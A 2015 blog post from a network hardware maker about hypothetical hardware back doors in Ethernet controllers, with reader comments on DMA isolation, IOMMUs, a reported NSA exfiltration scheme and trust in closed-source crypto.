2015-04-28

Back doors

Obviously, especially since Snowden, we are all concerned over "back doors" in systems.

But we have had some interesting discussions in the office. Working on FireBrick we make hardware and software from scratch. But even then we are using standard parts, such as processors and Ethernet controllers, and so on.

One of the mind games we play is trying to work out how someone could infiltrate us, using social engineering or technologically or whatever. It is a fun game, but is worth considering, in case we find any defences.

So we pondered, what if the chips we use had back doors? What could those back doors be, and how could they work.

Well, I had two ideas. One was something that tries to pass information to "them", via Ethernet frames. But such a system would be spotted. If not by us during testing, but by millions of other people.

But a simpler idea is something passive - even in a simple Ethernet controller. These things have access to the memory of the system via the bus and DMA and so on. They need this to send and receive legitimate packets.

If I wanted to implant a back door, I would make an Ethernet controller able to respond to a specially crafted packet. Instead of passing that to the processor as normal, it would take some action and send a reply packet. The action could simply be to allow reading or writing of system memory using the same DMA and memory access needed to send and receive normal packets.

The upshot would be that nothing would be detectable unless targeted.

But if targeted, the packets would look like normal IP packets. The payloads could even be scrambled or encrypted in some way. It could be used to attack anything that is accessible on the Internet and provide a way to access the running memory of the system remotely.

This could allow access to private keys for encryption and allow patching of code live to add proper back doors.

Now, this could apply to an Ethernet controller chip, or even a library part included in a custom logic gate array. It could be in an Ethernet card or whatever. The back door itself could be tiny in terms of silicon if all it does is read and write memory in response to some simple packet. Even people making their own silicon could find they have a back door!

The only issue is the reputation of the manufacturer if caught out... Is that enough to protect us? If some large company making such devices caved in to pressure? What if a few key employees caved in to a bribe. Scary?

Update: We have checked the coding on the FireBricks and the memory mapping does mean the Ethernet controller can only access the packet buffer memory and not general RAM or Flash which may otherwise hold keys, etc. So we are on top of this risk already to some extent :-)

12 comments:

  1. Hmmm. Home-made close-source crypto implementations is scarier! To me at least. Unless you have a big bunch of the world's most experienced crypto engineers and mathematicians that is. Crypto is hard... don't do it yourself.

    Or maybe "Cliff" as you said in your previous post is a pseudonym for a much bigger and well-funded entity ;)

    ReplyDelete
  2. @batfastad - Rev's not talking about implementing this themselves, rather that it could already be in the components they buy in.

    An obvious defence is to firewall the Ethernet controller and associated member from the system memory via something which prevents the Ethernet controller having unrestricted access to system memory.

    ReplyDelete
  3. The NSA's project FASHIONCLEFT involves three devices. Firstly there's a router or intelligent switch inside an organisation that has been compromised by the NSA, we'll call that W, and then there's a PC, laptop, tablet, whatever that has also been compromised by a separate route, let's call that P. And finally there's a device out in the public Internet infrastructure, maybe it's a Level 3 router for the US West Coast for example, let's call that B - which the NSA has installed or modified with court approval.

    So let's say your organisation has this very tight firewall rule. No externally initiated connections at all, and outbound only HTTPS on port 443. You have a strict policy of investigating any unusual activity. Device P has some information on it that matches an outstanding NSA request - it sends this towards W, but not directly to it (e.g. sending to a device on a network W routes). W catches this data, makes a copy and drops the "original" packet on the floor. Now comes the clever part. W watches for traffic leaving the organisation which will pass through B and it hides the stolen information in that traffic. When the traffic reaches B, B removes the hidden information and allows it to continue to its destination. The destination IP address, so often thought of as a smoking gun, is actually irrelevant!

    So even if the organisation realises something happened, and investigates, they will most likely find that P was sending data to some unrelated device like a printer or phone, there's nothing wrong with that device. If they look at their firewall they'll see that only unrelated legitimate seeming data went out, and to legitimate seeming places, and none of those places is corrupted. They will never know the NSA was involved, there is no trace of the NSA anywhere, except for that seemingly unrelated equipment B. They may not even realise W was compromised.

    FASHIONCLEFT exists. It was so widely used that the main evidence we have for its existence is a Powerpoint slide deck about how to best handle the metadata from FASHIONCLEFT to retrieve the huge volume of data collected in the most useful way.

    ReplyDelete
  4. Something like this?
    http://esec-lab.sogeti.com/static/publications/11-recon-nicreverse_slides.pdf

    ReplyDelete
  5. Yes, this is a concern. I'm fairly sure some security vulnerabilities were found in Wi-Fi chips some time ago. You're assuming that any vulnerability would be the product of malice, though; it's just as likely to be unwitting, and then capitalized upon by "them".

    The only real way to fix this (other than using open source hardware, which doesn't really work well like open source software does, due to the high fabrication costs) is to use an IOMMU to restrict device access to DMA just as one does with OS processes.

    I get the impression OSes are finally starting to bother with this; IOMMUs have been common (though not ubiquitous) in PCs for some time, but have only really been used to enable OS virtualization. But if correctly configured, they could be used to distrust devices which use DMA, and ensure they only use the memory areas which they have been told to.

    ReplyDelete
  6. Revk, are you saying that you (or Cliff) have written the IPsec stack that your hardware uses by hand and not used a third party library? Do you have any plans to put the hardware through either the Common Criteria network device protection profile certification (https://www.commoncriteriaportal.org/pps/) or the UK's CPA VPN server protection profile (https://www.cesg.gov.uk/publications/Documents/sc_vpn_ipsec_security_gateway.pdf) so that, we the users, know that it's doing sensible things?

    In your update you say "Update: We have checked the coding on the FireBricks and the memory mapping does mean the Ethernet controller can only access the packet buffer memory and not general RAM or Flash which may otherwise hold keys, etc. So we are on top of this risk already to some extent :-)" - is that enforced by hardware or software?

    Have you published your coding / build standards (or do you follow an open source one?). Is there any form of secure development lifecyle?

    ReplyDelete
  7. I can probably go in to a lot more detail on this I am sure. I thought I had blogged on some of the s/w development stuff before. We have a small team but we have decades of experience (including myself) working in large companies and s/w projects with mountains of bureaucracy. The end result is we have necessary systems in place (source control, backups, signed releases, and so on) but can be pragmatic when necessary. We have not had the VPN stuff tested externally, but have done several interoperability tests ourselves - happy to work with someone wanting to do such tests. As for the Ethernet, it is the MMU config in the chipset, so hardware but obviously configured by the s/w we run in the processor - not aware of any way an errant Ethernet controller could bypass that in the current design.

    ReplyDelete
  8. I deal with mountains of bureaucracy every day at work, I'm sure I spend no more than 25% of my time doing productive software development. This is an increasing problem in the software industry, we're drowning in crap as an industry.

    ReplyDelete
  9. Can an ethernet controller access the packet buffer of other interfaces, as if so it could bypass any encryption by retrieving the packets from the internal interface after the Firebrick has decrypted them?

    ReplyDelete
  10. You meant Snowden right? Snowdon's the mountain in Wales :P

    ReplyDelete
  11. Even experienced software engineers can get crypto wrong. The fact you're reimplementing it yourself, and then not releasing the source for public scrutiny, is a massive signal - to me at least - that using a firebrick is a risky proposition.

    ReplyDelete
    Replies
    1. I understand - and we have had some long discussions about this - and it comes down to trust. If we release the code, which we could, even if only for the crypto stuff, you have no way to know that is the code we are running. If we released the lot and a build system we compromise one oft he security features that all the code is signed to avoid bogus s/w releases by third parties with back doors. Ultimately if you don't trust us, we cannot really fix that even by releasing the code.

      Delete

Comments are moderated purely to filter out obvious spam, but it means they may not show immediately.

Deliveries from China

I have PCBs made in China (well Hong Kong). This is all my many small PCB projects (not FireBrick). I would rather use UK suppliers but I am...